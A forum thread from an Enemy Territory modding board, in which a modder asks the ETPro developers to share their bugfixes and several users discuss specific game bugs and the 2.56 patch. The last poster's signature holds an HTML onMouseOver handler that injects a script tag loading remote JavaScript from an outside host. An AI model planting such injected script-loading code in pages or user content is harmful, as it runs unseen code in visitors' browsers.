Question #2 - ETPro bugfixes/improvements with new mods ?

Discussions about ET modding (sdk code, player/weapon modeling)

Moderators: Forum moderators, developers

Svartberg

Question #2 - ETPro bugfixes/improvements with new mods ?

Post by Svartberg »

As we all know, etpro has introduced numerous fixes and improvements to the game (too many to count here).

Mods cannot coexist together, therefore any new modder will obviously want to encoporate them and will have to rewrite the various (and should i say the numerous again) fixes/improvements.

The question is, will we be given a first (sdk) degree help, or a second (list with comments)degree help for them, or are we on our own here ?

I am now in the process of writing a small mod, based for 10v10 organized games (only 4 changes - balance issues), but it seems 95% of my work is going to be rewriting the various etpro fixes or it will be a waste to play it, and i doubt it'll be as good as the originals.

Thanks in advance.
bani
Site Admin

Post by bani »

we wont tutor where it would be considered quake3 general skillset, where you could find the answer in q3 modding forums.

we will help where it is ET (any maybe rtcw) specific issues, or where we had trouble ourselves
Svartberg

Post by Svartberg »

I did not (yet) ask about my addons.

I marely asked if the numerous fixes you have introduced to etmain via etpro will be available directly (SDK) or indirectly (fixes list with comments), or will new modders will have to start from scratch and incoporate all these fixes themselves.

Having some programming experience (from a past gaming project), i understand if you will simply say no here, but it will be a little wasteful not to ask, as etpro features are a result of a lot of work, and it would mean that if i want to write this small 6 features mod, i will also have to rewrite a lot of fixes presented in etpro/shrub, which will make my work as a one week my mod 2 monthes rewriting what has already been written.
(i'm reffering only to the fixes/improvements)
bani
Site Admin

Post by bani »

'it depends'. specifically on which fixes you want.

'all of them' is not an answer 8)

none of etpro's fixes are in the sdk, the sdk is etmain.

some of the fixes are non trivial and involve a lot of code...

we can probably share some of the more annoying fixes that involve relatively small amounts of code.
Svartberg

Post by Svartberg »

It seems i have accidently used the word "SDK" instead of "code"

Well, i do not ask for the entire code, i am asking for those annoying fixes, and not less helpful would be a list of the various fixes you have introduced and would serve as a great source for ET modders. (in my opinion, a lot of people are used to ETPro and don't know must of the etmain bugs).

Thanks in advance.
bani
Site Admin

Post by bani »

Svartberg

Post by Svartberg »

That goes for the list, cool, i'll bookmark that one.

Thanks
sniser2

Post by sniser2 »

Svartberg, why don't you publish the fixes for the mod you're working on, too?
Svartberg

Post by Svartberg »

Take bani's answer and apply it to me, i'm just giving what i recieve.
Chruker

Post by Chruker »

Are some of those fixes only related to ETPro? Or are all of the bugs present in etmain?

To start with there are a few, which I haven't been able to reproduce locally:
- k43/garand unlimited grenade ammo exploit
- Compass doesn't clips map icons correctly
- Couldn't see votestring as spectator
- switching to weapon after dropping dynamite/stachel/landmine
- Indoor airstrikes fixed
- AKimbo pistols don't give XP
- Dont get points for defusing dynamite near non-destroyables (a/h cabinets, doors on goldrush)

And this one:
- Binoculars can no longer be used with when mobile mg42 is activated.
is that fixing the one where the game puts on the binocs but doesn't do any zoom?
Rain

Post by Rain »

The bug lists changes against both etmain and etpro. Some of the bugs aren't trivial to duplicate, some are fairly subtle, and some bugs were fixed by the ET 2.56 patch (we shared several bugfixes with Splash Damage before the patch was released.)

Offhand, I can remember that the akimbo XP bug was fixed in 2.56, the weapon switching after dynamite/satchel/landmine was fixed for at least 99% of problem cases in 2.56 (I went insane finding this one), and the compass bug was not fixed in 2.56 (but is subtle.)
Chruker wrote:- Binoculars can no longer be used with when mobile mg42 is activated.
is that fixing the one where the game puts on the binocs but doesn't do any zoom?
Yes.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>